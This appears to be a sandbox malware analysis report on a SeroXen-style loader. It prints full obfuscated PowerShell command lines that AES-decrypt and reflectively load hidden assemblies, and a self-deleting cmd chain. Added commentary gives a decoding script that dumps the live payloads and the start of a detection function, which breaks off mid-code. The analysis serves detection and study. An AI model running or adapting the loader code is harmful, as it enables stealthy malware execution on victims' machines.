System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1ad686d3-6289-4170-85b2-858f2c56b85a}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c3d49fa7-52c6-4784-98d1-76949fb3e7b8}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1360).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = 
[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = 
$lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = 
[Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5c4e2d40-574e-4626-b7fc-fb1db406b3d0}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{fbfc520c-25ea-4826-8053-64daccd72cd3}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{93d53fe0-737e-4969-aa1b-b22c1cb9e10c}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63d3beff-95f3-4a6b-a136-613c8b7c9e3f}5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 4766⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{63ecd9b9-f51f-46d8-8c33-b343ae522a50}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4ae1e1b9-65f9-4fe5-b024-06ec17e466d7}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{b69fd42f-7c0a-44e3-bc77-40f523d98cab}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4d1351a7-3c42-4deb-aba4-ce8531616c09}5⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies visibility of file extensions in Explorer
- Modifies visibility of hidden/system files in Explorer
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
    C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

    C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
      Command line: "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Deletes itself
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\dllhost.exe
        Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{949b51b3-d7a3-4ebe-9b7b-1661ca7262d3}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\SysWOW64\dllhost.exe
        Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{24d84389-231a-45b4-86b5-56b3d609a219}

      C:\Windows\SysWOW64\dllhost.exe
        Command line: C:\Windows\SysWOW64\dllhost.exe /Processid:{3d8c1519-320c-40c1-ab91-c606a7ea7231}

      C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe" & exit

        C:\Windows\System32\Conhost.exe
          Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - Suspicious use of SetWindowsHookEx

        C:\Windows\system32\PING.EXE
          Command line: PING localhost -n 8
          - Runs ping.exe

        C:\Windows\system32\taskkill.exe
          Command line: taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
          - Kills process with taskkill

        C:\Windows\system32\attrib.exe
          Command line: ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe"
          - Views/modifies file attributes

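The captured Uni.bat.exe command line above is the whole loader. It reads Uni.bat back in, takes the first line that starts with SEROXEN, splits the remainder on a backslash into two Base64 blobs, and runs each through AES-CBC/PKCS7 (key and IV are hard-coded in the script) and then GZip before handing the bytes to [Reflection.Assembly]::Load and invoking the entry point with a fixed string[] argument. The reversed-string trick ('gnirtS46esaBmorF'[-1..-16] -join '') only rebuilds the method names FromBase64String, Load and ReadAllText at run time so they never appear literally in the command line. The script below is an added example, not code from the report or from the sample: it repeats the same decode chain with the key and IV taken from the command line, but writes the two decrypted assemblies to disk instead of loading them. The input and output paths are placeholders; run it only in an isolated analysis VM, because the output files are the live payload.

```powershell
# Added example: defanged re-implementation of the SeroXen loader stage shown in
# the process tree. Same lookup -> Base64 -> AES-CBC -> GZip chain, but the result
# is written to disk instead of being passed to [Reflection.Assembly]::Load.
# $BatPath and $OutDir are placeholders (assumption, not from the report).
param(
    [string]$BatPath = 'C:\analysis\Uni.bat',
    [string]$OutDir  = 'C:\analysis\out'
)

# Key and IV exactly as embedded in the captured command line:
# 32-byte key (AES-256) and 16-byte IV, both static.
$Key = [Convert]::FromBase64String('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570=')
$IV  = [Convert]::FromBase64String('9iro50udEDaxZ/wkUff9RA==')

function Unprotect-Stage([byte[]]$Cipher) {
    # Mirrors agDFc(): AES/CBC/PKCS7 with the static key and IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = $Key
        $aes.IV      = $IV
        $dec = $aes.CreateDecryptor()
        try { return $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Stage([byte[]]$Gz) {
    # Mirrors cZEYh(): GZip-decompress the decrypted blob into a byte[].
    $in  = New-Object System.IO.MemoryStream(,$Gz)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return $out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# Same carrier lookup as the loader: first line beginning with "SEROXEN"; the
# 7-character prefix is dropped and the rest holds two Base64 blobs split by '\'.
$carrier = [System.IO.File]::ReadAllLines($BatPath) |
           Where-Object { $_.StartsWith('SEROXEN') } |
           Select-Object -First 1
if (-not $carrier) { throw "No SEROXEN carrier line found in $BatPath" }

$blobs = $carrier.Substring(7).Split('\')
if ($blobs.Count -lt 2) { throw "Expected two backslash-separated Base64 blobs, got $($blobs.Count)" }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# The loader invokes blob index 1 first and index 0 second; keep that order in the names.
$order = @(
    @{ Index = 1; Name = 'stage1_first_invoked.bin' },
    @{ Index = 0; Name = 'stage2_second_invoked.bin' }
)

foreach ($s in $order) {
    $raw = [Convert]::FromBase64String($blobs[$s.Index])
    $pe  = Expand-Stage (Unprotect-Stage $raw)
    $dst = Join-Path $OutDir $s.Name
    [System.IO.File]::WriteAllBytes($dst, $pe)

    # Sanity check: a .NET assembly is a PE file, so the output must start with "MZ".
    $isPe = ($pe.Length -gt 2 -and $pe[0] -eq 0x4D -and $pe[1] -eq 0x5A)
    $sha  = (Get-FileHash -Algorithm SHA256 -Path $dst).Hash
    "{0}: {1} bytes, MZ={2}, SHA256={3}" -f $s.Name, $pe.Length, $isPe, $sha
}
```

The MZ check is the quick test that decryption and decompression actually produced a PE; if it fails on another sample from the same family, the key, IV or carrier prefix has changed and the constants must be re-read from that sample's command line. Hashing the dumped files lets them be matched against the sandbox's own file hashes and against detonation memory dumps.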
C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\SppExtComObj.exe
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  - Modifies data under HKEY_USERS

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  Command line: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  - Drops file in System32 directory

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe
  Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\wbem\wmiprvse.exe
  Command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\DllHost.exe
  Command line: C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\System32\svchost.exe
  Command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess

  C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5328 -ip 5328
    - Suspicious use of NtCreateProcessExOtherParentProcess

  C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -pss -s 620 -p 4844 -ip 4844
    - Suspicious use of NtCreateProcessExOtherParentProcess

  C:\Windows\system32\WerFault.exe
    Command line: C:\Windows\system32\WerFault.exe -pss -s 668 -p 5320 -ip 5320
    - Suspicious use of NtCreateProcessExOtherParentProcess
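The process tree gives four behaviours that are worth encoding as detections rather than as file hashes: PowerShell launch switches (-noprofile -windowstyle hidden -ep bypass) on an image that is not powershell.exe or pwsh.exe; reversed-string obfuscation and reflective assembly loading in the command line; a COM surrogate (dllhost.exe /Processid:{...}) started by that process instead of by svchost.exe; and a cmd.exe self-delete chain that uses PING as a sleep before taskkill, ATTRIB and del. The function below is an added example, not part of the report or of any sandbox product: it runs those heuristics over process-creation records in the shape Sysmon Event ID 1 or Windows event 4688 provide (Image, ParentImage, CommandLine). The sample records are constructed for the demo; their command lines are copied from the tree (the loader's is cut down to the relevant fragments), the parent of the Uni.bat.exe record is assumed, and the two benign controls are invented.

```powershell
# Added example: heuristic process-creation checks for the behaviours in the tree above.
function Test-LoaderIndicators {
    # Returns one object per record that matches at least one heuristic.
    param([Parameter(Mandatory)][hashtable[]]$Events)

    foreach ($e in $Events) {
        $img = [string]$e.Image; $cmd = [string]$e.CommandLine; $parent = [string]$e.ParentImage
        $hits = @()

        # 1. PowerShell switches on an image that is not powershell.exe/pwsh.exe
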